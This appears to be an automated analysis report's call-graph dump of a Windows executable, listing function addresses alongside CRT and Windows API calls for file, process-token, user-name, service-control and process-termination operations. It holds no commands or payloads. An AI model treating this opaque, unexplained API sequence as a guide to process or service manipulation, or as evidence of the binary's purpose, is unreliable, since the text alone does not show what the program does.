55245->55247 55267 b379a7 66 API calls 2 library calls 55246->55267 55248 b492b6 55247->55248 55249 b492aa 55247->55249 55268 b492e1 LeaveCriticalSection __wdupenv_s 55248->55268 55265 b379a7 66 API calls 2 library calls 55249->55265 55252 b492b0 55266 b3cfc7 66 API calls __getptd_noexit 55252->55266 55255->55177 55256->55177 55257->55181 55258->55190 55260->55226 55261->55234 55262->55237 55263->55236 55264->55244 55265->55252 55266->55248 55267->55248 55268->55244 55279 b5619d 55269->55279 55271 b562ae 55271->55204 55272->55197 55273->55204 55274->55207 55275->55209 55276->55211 55277->55203 55278->55204 55280 b561a9 __commit 55279->55280 55281 b561bc 55280->55281 55284 b561f2 55280->55284 55399 b3cfc7 66 API calls __getptd_noexit 55281->55399 55283 b561c1 55400 b3d6b5 11 API calls __invalid_parameter_noinfo_noreturn 55283->55400 55290 b559ba 55284->55290 55287 b5620c 55401 b56233 LeaveCriticalSection __unlock_fhandle 55287->55401 55289 b561cb __commit 55289->55271 55291 b559e1 55290->55291 55402 b3803d 55291->55402 55294 b560ee __commit 55297 b56125 55294->55297 55298 b56110 55294->55298 55295 b55a3c 55427 b3cfda 66 API calls __getptd_noexit 55295->55427 55300 b559ba __tsopen_nolock 120 API calls 55297->55300 55460 b3cfc7 66 API calls __getptd_noexit 55298->55460 55299 b55a41 55428 b3cfc7 66 API calls __getptd_noexit 55299->55428 55305 b5613f 55300->55305 55302 b559fd 55302->55295 55303 b55a97 55302->55303 55398 b55c6c 55302->55398 55310 b55b1e 55303->55310 55314 b55af1 55303->55314 55462 b56163 LeaveCriticalSection __unlock_fhandle 55305->55462 55306 b56115 55461 b3d6b5 11 API calls __invalid_parameter_noinfo_noreturn 55306->55461 55308 b55a4b 55429 b3d6b5 11 API calls __invalid_parameter_noinfo_noreturn 55308->55429 55430 b3cfda 66 API calls __getptd_noexit 55310->55430 55312 b56151 55318 b56120 __commit 55312->55318 55463 b3cfc7 66 API calls __getptd_noexit 55312->55463 55409 b3f6c1 55314->55409 55315 b55b23 55431 b3cfc7 66 API calls __getptd_noexit 55315->55431 55318->55287 55319 b55b2d 55432 b3d6b5 11 API calls __invalid_parameter_noinfo_noreturn 55319->55432 55322 b55a55 55322->55287 55323 b55baf 55324 b55bd9 CreateFileW 55323->55324 55325 b55bb8 55323->55325 55326 b55c76 GetFileType 55324->55326 55327 b55c06 55324->55327 55433 b3cfda 66 API calls __getptd_noexit 55325->55433 55331 b55cc7 55326->55331 55332 b55c83 GetLastError 55326->55332 55329 b55c14 55327->55329 55330 b55c3f GetLastError 55327->55330 55329->55330 55334 b55c1a CreateFileW 55329->55334 55436 b3cfed 66 API calls 2 library calls 55330->55436 55440 b3f48b 67 API calls __commit 55331->55440 55438 b3cfed 66 API calls 2 library calls 55332->55438 55333 b55bbd 55434 b3cfc7 66 API calls __getptd_noexit 55333->55434 55334->55326 55334->55330 55338 b55cac CloseHandle 55340 b55cba 55338->55340 55346 b55c66 55338->55346 55339 b55bc7 55435 b3cfc7 66 API calls __getptd_noexit 55339->55435 55439 b3cfc7 66 API calls __getptd_noexit 55340->55439 55344 b55ce5 55347 b55d3b 55344->55347 55348 b55dab 55344->55348 55349 b55fda 55344->55349 55437 b3cfc7 66 API calls __getptd_noexit 55346->55437 55441 b3e834 68 API calls 2 library calls 55347->55441 55348->55349 55362 b55f05 55348->55362 55371 b55e55 55348->55371 55350 b55efc 55349->55350 55349->55398 55350->55349 55352 b56064 CloseHandle CreateFileW 55350->55352 55350->55398 55356 b56091 GetLastError 55352->55356 55352->55398 55353 b55d45 55354 b55d67 55353->55354 55355 b55d4e 55353->55355 55444 b3ead7 76 API calls 5 library calls 55354->55444 55442 b3cfda 66 API calls __getptd_noexit 55355->55442 55457 b3cfed 66 API calls 2 library calls 55356->55457 55360 b5609d 55458 b3f50c 67 API calls __commit 55360->55458 55361 b55d53 55361->55348 55365 b55d5b 55361->55365 55362->55349 55373 b55f22 55362->55373 55375 b55e79 55362->55375 55363 b55d78 55367 b55d92 55363->55367 55445 b5c0dc 100 API calls 4 library calls 55363->55445 55443 b41ce8 69 API calls 3 library calls 55365->55443 55366 b55ec0 55366->55365 55449 b3ead7 76 API calls 5 library calls 55366->55449 55367->55365 55446 b3e834 68 API calls 2 library calls 55367->55446 55371->55349 55371->55366 55371->55375 55376 b55ea4 55371->55376 55450 b4a89a 68 API calls 2 library calls 55373->55450 55375->55349 55375->55365 55456 b3e57a 97 API calls 4 library calls 55375->55456 55447 b4a89a 68 API calls 2 library calls 55376->55447 55377 b55f2d 55377->55375 55384 b55f38 55377->55384 55379 b55f63 55452 b41ce8 69 API calls 3 library calls 55379->55452 55380 b55f7d 55382 b55f9f 55380->55382 55388 b55f84 55380->55388 55381 b55eda 55381->55350 55381->55365 55381->55379 55381->55380 55381->55382 55455 b3e834 68 API calls 2 library calls 55382->55455 55451 b4a89a 68 API calls 2 library calls 55384->55451 55454 b3e834 68 API calls 2 library calls 55388->55454 55389 b55eaf 55389->55375 55393 b55eb6 55389->55393 55390 b55f42 55390->55349 55390->55365 55391 b55f6a 55453 b3cfc7 66 API calls __getptd_noexit 55391->55453 55448 b4a89a 68 API calls 2 library calls 55393->55448 55397 b55f8e 55397->55350 55397->55365 55459 b3d649 10 API calls __call_reportfault 55398->55459 55399->55283 55400->55289 55401->55289 55403 b38049 55402->55403 55404 b3805e 55402->55404 55464 b3cfc7 66 API calls __getptd_noexit 55403->55464 55404->55302 55406 b3804e 55465 b3d6b5 11 API calls __invalid_parameter_noinfo_noreturn 55406->55465 55408 b38059 55408->55302 55410 b3f6cd __commit 55409->55410 55411 b49228 __mtinitlocknum 66 API calls 55410->55411 55412 b3f6dd 55411->55412 55413 b492ea __lock 66 API calls 55412->55413 55414 b3f6e2 __commit 55412->55414 55423 b3f6f1 55413->55423 55414->55323 55415 b3f833 55474 b3f851 LeaveCriticalSection __wdupenv_s 55415->55474 55417 b3f7c9 55467 b45b13 55417->55467 55419 b492ea __lock 66 API calls 55419->55423 55420 b3f771 EnterCriticalSection 55422 b3f781 LeaveCriticalSection 55420->55422 55420->55423 55422->55423 55423->55415 55423->55417 55423->55419 55423->55420 55424 b3f747 InitializeCriticalSectionAndSpinCount 55423->55424 55466 b3f793 LeaveCriticalSection __wdupenv_s 55423->55466 55424->55423 55427->55299 55428->55308 55429->55322 55430->55315 55431->55319 55432->55322 55433->55333 55434->55339 55435->55322 55436->55346 55437->55398 55438->55338 55439->55346 55440->55344 55441->55353 55442->55361 55443->55346 55444->55363 55445->55367 55446->55361 55447->55389 55448->55366 55449->55381 55450->55377 55451->55390 55452->55391 55453->55398 55454->55397 55455->55390 55456->55375 55457->55360 55458->55398 55459->55294 55460->55306 55461->55318 55462->55312 55463->55318 55464->55406 55465->55408 55466->55423 55469 b45b1c 55467->55469 55470 b3f7d2 55469->55470 55471 b45b3a Sleep 55469->55471 55475 b483dc 55469->55475 55470->55415 55473 b3f5fb 68 API calls 3 library calls 55470->55473 55472 b45b4f 55471->55472 55472->55469 55472->55470 55473->55415 55474->55414 55476 b483e8 55475->55476 55480 b48403 55475->55480 55477 b483f4 55476->55477 55476->55480 55478 b3cfc7 __commit 65 API calls 55477->55478 55481 b483f9 55478->55481 55479 b48416 HeapAlloc 55479->55480 55483 b4843d 55479->55483 55480->55479 55482 b3f463 _malloc DecodePointer 55480->55482 55480->55483 55481->55469 55482->55480 55483->55469 55484 b15bb0 55485 b15c00 55484->55485 55486 b15bbd 55484->55486 55490 b15c12 55485->55490 55491 b15c0f CloseHandle 55485->55491 55487 b15beb 55486->55487 55488 b15bc2 SetEvent 55486->55488 55487->55485 55489 b15bf5 CloseHandle 55487->55489 55492 b15bd2 55488->55492 55489->55485 55493 b15c18 CloseHandle 55490->55493 55494 b15c1b 55490->55494 55491->55490 55492->55487 55495 b15bdb WaitForSingleObject 55492->55495 55493->55494 55495->55487 55495->55492 55496 b1a250 55497 b1a27e 55496->55497 55498 b1a288 GetModuleFileNameW 55497->55498 55514 b3ab18 55498->55514 55500 b1a2e0 GetCurrentProcessId wsprintfW CreateEventW 55502 b1a473 55500->55502 55503 b1a31a GetLastError 55500->55503 55501 b1a2ab std::locale::facet::_Facet_Register _wcschr 55501->55500 55505 b382b3 _wcsupr_s_l_stat 5 API calls 55502->55505 55503->55502 55504 b1a32b LocalAlloc InitializeSecurityDescriptor SetSecurityDescriptorDacl 55503->55504 55506 b1a370 wsprintfW CreateEventW 55504->55506 55507 b1a482 55505->55507 55508 b1a3a5 GetLastError 55506->55508 55509 b1a3cb 55506->55509 55508->55509 55510 b1a3b2 CloseHandle 55508->55510 55509->55506 55511 b1a3d9 55509->55511 55512 b1a3db wsprintfW CreateEventW 55509->55512 55510->55509 55513 b1a40b 6 API calls 55511->55513 55512->55513 55513->55502 55526 b15a70 55513->55526 55515 b3ab26 55514->55515 55516 b3ab6c 55514->55516 55521 b3ab41 55515->55521 55523 b3cfc7 66 API calls __getptd_noexit 55515->55523 55525 b3aab4 77 API calls 2 library calls 55516->55525 55519 b3ab32 55524 b3d6b5 11 API calls __invalid_parameter_noinfo_noreturn 55519->55524 55521->55501 55522 b3ab3d 55522->55501 55523->55519 55524->55522 55525->55521 55527 b15a83 55526->55527 55546 b15120 55527->55546 55529 b15a93 WaitForMultipleObjects 55531 b15b4a 55529->55531 55532 b15adc 55529->55532 55533 b15b95 55531->55533 55535 b15b53 Sleep GetCurrentProcess TerminateProcess 55531->55535 55536 b15b82 55531->55536 55534 b15ae0 WaitForSingleObject 55532->55534 55537 b15b02 ResetEvent 55534->55537 55539 b15af6 55534->55539 55536->55533 55538 b15b87 55536->55538 55562 b155b0 236 API calls 2 library calls 55537->55562 55563 b155b0 236 API calls 2 library calls 55538->55563 55539->55537 55542 b15b19 55544 b15b29 SetEvent WaitForMultipleObjects 55542->55544 55543 b15b92 55543->55533 55544->55534 55545 b15b45 55544->55545 55545->55531 55547 b15160 55546->55547 55548 b1513c GetCurrentProcess 55546->55548 55550 b1522f 55547->55550 55559 b1518e 55547->55559 55564 b097d0 55547->55564 55548->55547 55549 b1514e GetModuleFileNameW 55548->55549 55549->55547 55551 b382b3 _wcsupr_s_l_stat 5 API calls 55550->55551 55553 b15249 55551->55553 55553->55529 55555 b151c7 WideCharToMultiByte 55556 b151f8 _strrchr 55555->55556 55556->55550 55558 b1521e 55556->55558 55560 b382b3 _wcsupr_s_l_stat 5 API calls 55558->55560 55559->55555 55559->55556 55561 b1522b 55560->55561 55561->55529 55562->55542 55563->55543 55565 b37ca4 _malloc 66 API calls 55564->55565 55566 b097ee 55565->55566 55567 b09820 _memset 55566->55567 55568 b097f7 wsprintfW 55566->55568 55570 b382b3 _wcsupr_s_l_stat 5 API calls 55567->55570 55584 b00c30 187 API calls std::locale::facet::_Facet_Register 55568->55584 55571 b0983d 55570->55571 55571->55559 55572 b14760 GetModuleFileNameW 55571->55572 55573 b147dd 55572->55573 55580 b147a0 std::locale::facet::_Facet_Register 55572->55580 55574 b147e3 LoadLibraryW 55573->55574 55575 b147fd GetModuleHandleW GetProcAddress 55573->55575 55574->55575 55576 b147f2 LoadLibraryW 55574->55576 55577 b1482b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 55575->55577 55578 b1481d 55575->55578 55576->55575 55579 b14857 11 API calls 55577->55579 55578->55579 55581 b382b3 _wcsupr_s_l_stat 5 API calls 55579->55581 55580->55573 55580->55580 55582 b147cf LoadLibraryW 55580->55582 55583 b148df 55581->55583 55582->55573 55583->55559 55584->55567 55585 b3d366 55623 b3dcc0 55585->55623 55587 b3d372 GetStartupInfoW 55588 b3d386 HeapSetInformation 55587->55588 55590 b3d391 55587->55590 55588->55590 55624 b3e97d HeapCreate 55590->55624 55591 b3d3df 55592 b3d3ea 55591->55592 55789 b3d2f6 66 API calls 3 library calls 55591->55789 55625 b42d4e GetModuleHandleW 55592->55625 55595 b3d3f0 55596 b3d3fb __RTC_Initialize 55595->55596 55790 b3d2f6 66 API calls 3 library calls 55595->55790 55650 b3da1b GetStartupInfoW 55596->55650 55600 b3d415 GetCommandLineW 55663 b4a6ad GetEnvironmentStringsW 55600->55663 55604 b3d425 55670 b4a5ff GetModuleFileNameW 55604->55670 55607 b3d43a 55676 b4a3be 55607->55676 55610 b3d440 55611 b3d44b 55610->55611 55793 b3cc6b 66 API calls 3 library calls 55610->55793 55690 b3ca4a 55611->55690 55614 b3d453 55616 b3d45e __wwincmdln 55614->55616 55794 b3cc6b 66 API calls 3 library calls 55614->55794 55696 b2ddd0 SetUnhandledExceptionFilter GetModuleFileNameW 55616->55696 55618 b3d480 55619 b3d48e 55618->55619 55786 b3cc21 55618->55786 55795 b3cc4d 66 API calls _doexit 55619->55795 55622 b3d493 __commit 55623->55587 55624->55591 55626 b42d62 55625->55626 55627 b42d6b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 55625->55627 55796 b42a21 70 API calls _free 55626->55796 55629 b42db5 TlsAlloc 55627->55629 55632 b42ec4 55629->55632 55633 b42e03 TlsSetValue 55629->55633 55631 b42d67 55631->55595 55632->55595 55633->55632 55634 b42e14 55633->55634 55797 b3c976 EncodePointer EncodePointer __init_pointers ___crtMessageBoxW __initp_misc_winsig 55634->55797 55636 b42e19 EncodePointer EncodePointer EncodePointer EncodePointer 55798 b49158 InitializeCriticalSectionAndSpinCount 55636->55798 55638 b42e58 55639 b42e5c DecodePointer 55638->55639 55640 b42ebf 55638->55640 55642 b42e71 55639->55642 55800 b42a21 70 API calls _free 55640->55800 55642->55640 55643 b45b13 __calloc_crt 66 API calls 55642->55643 55644 b42e87 55643->55644 55644->55640 55645 b42e8f DecodePointer 55644->55645 55646 b42ea0 55645->55646 55646->55640 55647 b42ea4 55646->55647 55799 b42a5e 66 API calls 4 library calls 55647->55799 55649 b42eac GetCurrentThreadId 55649->55632 55651 b45b13 __calloc_crt 66 API calls 55650->55651 55658 b3da39 55651->55658 55652 b3dbe4 GetStdHandle 55659 b3dbae 55652->55659 55653 b45b13 __calloc_crt 66 API calls 55653->55658 55654 b3dc48 SetHandleCount 55655 b3d409 55654->55655 55655->55600 55791 b3cc6b 66 API calls 3 library calls 55655->55791 55656 b3dbf6 GetFileType 55656->55659 55657 b3db2e 55657->55659 55660 b3db65 InitializeCriticalSectionAndSpinCount 55657->55660 55661 b3db5a GetFileType 55657->55661 55658->55653 55658->55655 55658->55657 55658->55659 55659->55652 55659->55654 55659->55656 55662 b3dc1c InitializeCriticalSectionAndSpinCount 55659->55662 55660->55655 55660->55657 55661->55657 55661->55660 55662->55655 55662->55659 55664 b4a6c2 55663->55664 55665 b4a6be 55663->55665 55801 b45ace 66 API calls _malloc 55664->55801 55665->55604 55668 b4a6e4 _memmove 55669 b4a6eb FreeEnvironmentStringsW 55668->55669 55669->55604 55671 b4a634 _wparse_cmdline 55670->55671 55672 b3d42f 55671->55672 55673 b4a671 55671->55673 55672->55607 55792 b3cc6b 66 API calls 3 library calls 55672->55792 55802 b45ace 66 API calls _malloc 55673->55802 55675 b4a677 _wparse_cmdline 55675->55672 55677 b4a3d6 _wcslen 55676->55677 55679 b4a3ce 55676->55679 55678 b45b13 __calloc_crt 66 API calls 55677->55678 55683 b4a3fa _wcslen 55678->55683 55679->55610 55680 b4a450 55804 b379a7 66 API calls 2 library calls 55680->55804 55682 b45b13 __calloc_crt 66 API calls 55682->55683 55683->55679 55683->55680 55683->55682 55684 b4a476 55683->55684 55687 b4a48d 55683->55687 55803 b3847c 66 API calls __commit 55683->55803 55805 b379a7 66 API calls 2 library calls 55684->55805 55806 b3d649 10 API calls __call_reportfault 55687->55806 55689 b4a499 55689->55610 55691 b3ca58 __IsNonwritableInCurrentImage 55690->55691 55807 b48261 55691->55807 55693 b3ca76 __initterm_e 55695 b3ca97 __IsNonwritableInCurrentImage 55693->55695 55810 b39c97 55693->55810 55695->55614 55697 b2de40 55696->55697 55698 b2de3a GetLastError 55696->55698 55699 b26080 220 API calls 55697->55699 55698->55697 55700 b2de4d 55699->55700 55701 b2ef04 55700->55701 55702 b2f030 208 API calls 55700->55702 55703 b382b3 _wcsupr_s_l_stat 5 API calls 55701->55703 55704 b2de69 55702->55704 55705 b2ef16 55703->55705 55706 b2f030 208 API calls 55704->55706 55705->55618 55707 b2de78 GetUserNameW 55706->55707 55814 afff40 55707->55814 55709 b2de94 55710 b2f030 208 API calls 55709->55710 55711 b2dea6 55710->55711 55829 b25490 LoadLibraryW 55711->55829 55713 b2deab 55842 b39cae 55713->55842 55715 b2decb 55716 b2f030 208 API calls 55715->55716 55717 b2df1c LoadStringW 55716->55717 55851 b2a5b0 55717->55851 55720 b2a5b0 149 API calls 55721 b2df5e 55720->55721 55722 b2a5b0 149 API calls 55721->55722 55723 b2df6a 55722->55723 55724 b2a5b0 149 API calls 55723->55724 55725 b2df76 55724->55725 55854 b39116 55725->55854 55728 b3ab18 77 API calls 55729 b2e032 55728->55729 55730 b3ab18 77 API calls 55729->55730 55731 b2e077 55730->55731 55862 b2f6d0 GetVersionExW 55731->55862 55733 b2e07f 55734 b2e087 GetPrivateProfileStringW lstrcmpiW 55733->55734 55735 b2e0dd GetModuleFileNameW 55733->55735 55734->55735 55736 b2e0d3 55734->55736 55737 b2e0f6 GetLastError 55735->55737 55738 b2e0fc 55735->55738 55736->55735 55737->55738 55739 b2f030 208 API calls 55738->55739 55740 b2e10d 55739->55740 55741 b2f030 208 API calls 55740->55741 55742 b2e11c 55741->55742 55743 b26080 220 API calls 55742->55743 55744 b2e129 55743->55744 55744->55701 55745 b2e134 55744->55745 55884 b3d09c DeleteFileW 55745->55884 55747 b2e15a 55890 b2b1f0 55747->55890 55749 b2e189 _wcschr 55750 b2e663 55749->55750 55767 b2e84d Sleep 55749->55767 55896 b3a558 85 API calls __toupper_l 55749->55896 55751 b2e705 55750->55751 55753 b2e678 GetCurrentDirectoryW 55750->55753 55758 b2e688 55750->55758 55754 b2f030 208 API calls 55751->55754 55753->55758 55755 b2edc7 55754->55755 55756 b2edd3 PostMessageW 55755->55756 55757 b2ede7 DestroyWindow 55755->55757 55756->55757 55759 b2ee02 55757->55759 55760 b2ef27 55757->55760 55897 b278f0 6 API calls 55758->55897 55766 b39583 std::locale::facet::_Facet_Register 136 API calls 55759->55766 55762 b382b3 _wcsupr_s_l_stat 5 API calls 55760->55762 55764 b2ef34 55762->55764 55763 b2e6ce 55765 b2f030 208 API calls 55763->55765 55764->55618 55769 b2e6e3 55765->55769 55770 b2ee2e 55766->55770 55899 b24420 219 API calls _wcsupr_s_l_stat 55767->55899 55769->55751 55771 b2e6f2 55769->55771 55772 b2ee48 55770->55772 55900 b373d1 99 API calls 7 library calls 55770->55900 55898 b24050 138 API calls 6 library calls 55771->55898 55773 b2ee53 Sleep 55772->55773 55774 b2ee6e 55772->55774 55776 b2f030 208 API calls 55773->55776 55777 b2f030 208 API calls 55774->55777 55781 b2ee68 55776->55781 55782 b2ee7b 55777->55782 55779 b2ee42 55901 b38c09 102 API calls 4 library calls 55779->55901 55902 b24420 219 API calls _wcsupr_s_l_stat 55781->55902 55784 b382b3 _wcsupr_s_l_stat 5 API calls 55782->55784 55785 b2ee8d 55784->55785 55785->55618 55989 b3cae1 55786->55989 55788 b3cc32 55788->55619 55789->55592 55790->55596 55795->55622 55796->55631 55797->55636 55798->55638 55799->55649 55800->55632 55801->55668 55802->55675 55803->55683 55804->55679 55805->55679 55806->55689 55808 b48267 EncodePointer 55807->55808 55808->55808 55809 b48281 55808->55809 55809->55693 55813 b39c5b 76 API calls 3 library calls 55810->55813 55812 b39ca4 55812->55695 55813->55812 55815 b00014 55814->55815 55816 afff53 GetModuleHandleW GetProcAddress 55814->55816 55815->55709 55817 afff7f GetCurrentProcessId 55816->55817 55818 afff9a GetCurrentProcessId OpenProcess 55816->55818 55820 afff88 55817->55820 55819 afffb7 OpenProcessToken 55818->55819 55822 afffe7 55818->55822 55821 afffc8 55819->55821 55819->55822 55820->55818 55823 afff8c 55820->55823 55821->55822 55824 afffcf GetTokenInformation 55821->55824 55825 b00003 CloseHandle 55822->55825 55826 b00006 55822->55826 55823->55709 55824->55822 55825->55826 55827 b0000a CloseHandle 55826->55827 55828 b0000d 55826->55828 55827->55828 55828->55815 55830 b254d8 GetProcAddress 55829->55830 55831 b255b1 55829->55831 55830->55831 55832 b254f1 GetProcAddress 55830->55832 55833 b382b3 _wcsupr_s_l_stat 5 API calls 55831->55833 55832->55831 55834 b25507 GetUserNameW 55832->55834 55835 b255be 55833->55835 55838 b25541 55834->55838 55835->55713 55836 b25580 55837 b255aa FreeLibrary 55836->55837 55837->55831 55838->55836 55838->55837 55839 b25582 55838->55839 55841 b2f030 208 API calls 55838->55841 55903 b00c30 187 API calls std::locale::facet::_Facet_Register 55839->55903 55841->55838 55843 b39cbf _wcslen 55842->55843 55846 b39cbb 55842->55846 55904 b3b552 66 API calls 2 library calls 55843->55904 55845 b39cd4 55845->55846 55905 b3847c 66 API calls __commit 55845->55905 55846->55715 55848 b39ce7 55848->55846 55849 b39cf2 55848->55849 55906 b3d649 10 API calls __call_reportfault 55849->55906 55907 b26e10 55851->55907 55853 b2a5be wsprintfW 55853->55720 55855 b39125 55854->55855 55856 b3918e 55854->55856 55861 b2df86 55855->55861 55946 b3cfc7 66 API calls __getptd_noexit 55855->55946 55948 b39013 78 API calls 3 library calls 55856->55948 55859 b39131 55947 b3d6b5 11 API calls __invalid_parameter_noinfo_noreturn 55859->55947 55861->55728 55871 b2f718 LoadLibraryW 55862->55871 55864 b2f7f3 55868 b2f7fb GetModuleHandleW GetProcAddress 55864->55868 55869 b2f865 55864->55869 55865 b2f7b8 GetProcAddress 55866 b2f7c6 GetCurrentProcess 55865->55866 55867 b2f7ea FreeLibrary 55865->55867 55874 b2f7d4 55866->55874 55867->55864 55872 b2f812 GetNativeSystemInfo 55868->55872 55873 b2f828 55868->55873 55870 b382b3 _wcsupr_s_l_stat 5 API calls 55869->55870 55875 b2f875 55870->55875 55871->55864 55871->55865 55872->55873 55876 b2f839 55872->55876 55877 b2f030 208 API calls 55873->55877 55874->55867 55879 b2f030 208 API calls 55874->55879 55875->55733 55878 b2f030 208 API calls 55876->55878 55877->55869 55880 b2f847 55878->55880 55882 b2f7e7 55879->55882 55881 b382b3 _wcsupr_s_l_stat 5 API calls 55880->55881 55883 b2f857 55881->55883 55882->55867 55883->55733 55885 b3d0b6 55884->55885 55886 b3d0ae GetLastError 55884->55886 55887 b3d0c8 55885->55887 55949 b3cfed 66 API calls 2 library calls 55885->55949 55886->55885 55887->55747 55889 b3d0c2 55889->55747 55893 b2b20c 55890->55893 55895 b2b244 55890->55895 55891 b382b3 _wcsupr_s_l_stat 5 API calls 55892 b2b264 55891->55892 55892->55749 55950 b29ef0 55893->55950 55895->55891 55896->55749 55897->55763 55898->55751 55899->55751 55900->55779 55901->55772 55902->55774 55903->55836 55904->55845 55905->55848 55906->55846 55908 b26e32 55907->55908 55909 b27602 55907->55909 55910 b26f1f GetModuleFileNameW 55908->55910 55917 b26e67 std::locale::facet::_Facet_Register 55908->55917 55911 b276af 55909->55911 55912 b2769c 55909->55912 55910->55917 55914 b382b3 _wcsupr_s_l_stat 5 API calls 55911->55914 55913 b382b3 _wcsupr_s_l_stat 5 API calls 55912->55913 55915 b276ab 55913->55915 55916 b276c0 55914->55916 55915->55853 55916->55853 55918 b39583 std::locale::facet::_Facet_Register 136 API calls 55917->55918 55919 b26f71 55918->55919 55919->55909 55937 b22110 118 API calls 4 library calls 55919->55937 55921 b26f98 55938 b21e20 82 API calls 3 library calls 55921->55938 55923 b26fc0 55934 b2750d 55923->55934 55939 b383d7 67 API calls __fassign 55923->55939 55926 b26fd4 55926->55934 55940 b26c20 68 API calls 4 library calls 55926->55940 55928 b27002 55941 b21e20 82 API calls 3 library calls 55928->55941 55930 b27015 55930->55934 55942 b21e20 82 API calls 3 library calls 55930->55942 55932 b27044 _wcschr 55932->55934 55936 b39116 78 API calls __wcsicoll 55932->55936 55943 b26c20 68 API calls 4 library calls 55932->55943 55944 b21e20 82 API calls 3 library calls 55932->55944 55945 b38c09 102 API calls 4 library calls 55934->55945 55936->55932 55937->55921 55938->55923 55939->55926 55940->55928 55941->55930 55942->55932 55943->55932 55944->55932 55945->55909 55946->55859 55947->55861 55948->55861 55949->55889 55951 b29f31 _memset 55950->55951 55952 b39583 std::locale::facet::_Facet_Register 136 API calls 55951->55952 55953 b29f95 55952->55953 55954 b29fa2 55953->55954 55955 b29fb8 55953->55955 55957 b382b3 _wcsupr_s_l_stat 5 API calls 55954->55957 55980 b22110 118 API calls 4 library calls 55955->55980 55958 b29fb4 55957->55958 55958->55895 55959 b29fc5 55981 b21e20 82 API calls 3 library calls 55959->55981 55961 b2a000 55973 b2a0f6 55961->55973 55982 b383d7 67 API calls __fassign 55961->55982 55964 b2a27b 55965 b382b3 _wcsupr_s_l_stat 5 API calls 55964->55965 55966 b2a28d 55965->55966 55966->55895 55967 b2a014 55967->55973 55983 b26c20 68 API calls 4 library calls 55967->55983 55969 b2a0db 55984 b21e20 82 API calls 3 library calls 55969->55984 55971 b2a0ee 55971->55973 55985 b21e20 82 API calls 3 library calls 55971->55985 55988 b38c09 102 API calls 4 library calls 55973->55988 55975 b2a12b _memset _wcschr _memmove 55975->55973 55977 b22000 WideCharToMultiByte 55975->55977 55978 b27710 67 API calls 55975->55978 55979 b38406 67 API calls 55975->55979 55986 b26c20 68 API calls 4 library calls 55975->55986 55987 b21e20 82 API calls 3 library calls 55975->55987 55977->55975 55978->55975 55979->55975 55980->55959 55981->55961 55982->55967 55983->55969 55984->55971 55985->55975 55986->55975 55987->55975 55988->55964 55990 b3caed __commit 55989->55990 55991 b492ea __lock 61 API calls 55990->55991 55992 b3caf4 55991->55992 55994 b3cb1f DecodePointer 55992->55994 55998 b3cb9e 55992->55998 55996 b3cb36 DecodePointer 55994->55996 55994->55998 56003 b3cb49 55996->56003 56010 b3cc0c 55998->56010 55999 b3cc03 56002 b3c94c _fast_error_exit 3 API calls 55999->56002 56001 b3cc1b __commit 56001->55788 56004 b3cc0c 56002->56004 56003->55998 56006 b3cb60 DecodePointer 56003->56006 56009 b3cb6f DecodePointer DecodePointer 56003->56009 56015 b4299e EncodePointer 56003->56015 56005 b3cc19 56004->56005 56017 b491f9 LeaveCriticalSection 56004->56017 56005->55788 56016 b4299e EncodePointer 56006->56016 56009->56003 56011 b3cc12 56010->56011 56012 b3cbec 56010->56012 56018 b491f9 LeaveCriticalSection 56011->56018 56012->56001 56014 b491f9 LeaveCriticalSection 56012->56014 56014->55999 56015->56003 56016->56003 56017->56005 56018->56012 56019 b67f20 56020 b097d0 std::locale::facet::_Facet_Register 188 API calls 56019->56020 56021 b67f2d 56020->56021 56022 b67f34 56021->56022 56023 b67f70 56021->56023 56025 b39c97 __cinit 76 API calls 56022->56025 56032 b385a6 56023->56032 56027 b67f69 56025->56027 56029 b67f98 LoadLibraryW 56030 b39c97 __cinit 76 API calls 56029->56030 56031 b67fe4 56030->56031 56038 b38548 56032->56038 56035 b391a1 56036 b391d6 RaiseException 56035->56036 56037 b391ca 56035->56037 56036->56029 56037->56036 56039 b3857b 56038->56039 56040 b38556 _strlen 56038->56040 56039->56035 56041 b37ca4 _malloc 66 API calls 56040->56041 56042 b38568 56041->56042 56042->56039 56044 b40a68 66 API calls __commit 56042->56044 56044->56039 56045 b2ea6c 56050 b29630 OpenSCManagerW 56045->56050 56048 b382b3 _wcsupr_s_l_stat 5 API calls 56049 b2ef34 56048->56049 56051 b2968f 56050->56051 56052 b2f030 208 API calls 56051->56052 56053 b296b2 GetLastError 56052->56053 56054 b2f030 208 API calls 56053->56054 56055 b296c9 56054->56055 56108 b29df1 56055->56108 56198 b26700 56055->56198 56056 b2f030 208 API calls 56058 b29dfe 56056->56058 56060 b382b3 _wcsupr_s_l_stat 5 API calls 56058->56060 56062 b29e19 56060->56062 56061 b2f030 208 API calls 56063 b296f3 56061->56063 56062->56048 56064 b29d2e 56063->56064 56065 b296fe QueryServiceStatus 56063->56065 56066 b2f030 208 API calls 56064->56066 56067 b2f030 208 API calls 56065->56067 56068 b29d38 CloseServiceHandle Sleep 56066->56068 56069 b2971f 56067->56069 56070 b29d5a 56068->56070 56068->56108 56071 b2f030 208 API calls 56069->56071 56072 b29b1b 56069->56072 56074 b2f030 208 API calls 56070->56074 56070->56108 56073 b2973c 56071->56073 56077 b29d11 56072->56077 56078 b2f030 208 API calls 56072->56078 56075 b29b07 56073->56075 56076 b2974c 56073->56076 56079 b29d6c GetSystemDirectoryW 56074->56079 56080 b2f030 208 API calls 56075->56080 56081 b2f030 208 API calls 56076->56081 56083 b2f030 208 API calls 56077->56083 56082 b29b39 56078->56082 56094 b29d90 56079->56094 56080->56072 56085 b29756 56081->56085 56086 b29b41 QueryServiceStatus 56082->56086 56087 b29b96 56082->56087 56084 b29d1e CloseServiceHandle 56083->56084 56084->56064 56201 b16e30 56085->56201 56090 b29b54 56086->56090 56113 b29b94 56086->56113 56088 b29cfd 56087->56088 56087->56113 56097 b2f030 208 API calls 56088->56097 56093 b2f030 208 API calls 56090->56093 56091 b2f030 208 API calls 56095 b29bad StartServiceW 56091->56095 56107 b29b60 56093->56107 56098 b26700 149 API calls 56094->56098 56100 b29bc3 56095->56100 56101 b29ce7 GetLastError 56095->56101 56097->56077 56099 b29dde 56098->56099 56221 b3cda8 66 API calls __commit 56099->56221 56104 b2f030 208 API calls 56100->56104 56105 b2f030 208 API calls 56101->56105 56109 b29bcf QueryServiceStatus 56104->56109 56110 b29cf8 56105->56110 56106 b29778 56205 ae3b70 236 API calls 56106->56205 56107->56087 56112 b29b75 Sleep QueryServiceStatus 56107->56112 56107->56113 56108->56056 56114 b29be7 56109->56114 56115 b29c0d 56109->56115 56110->56077 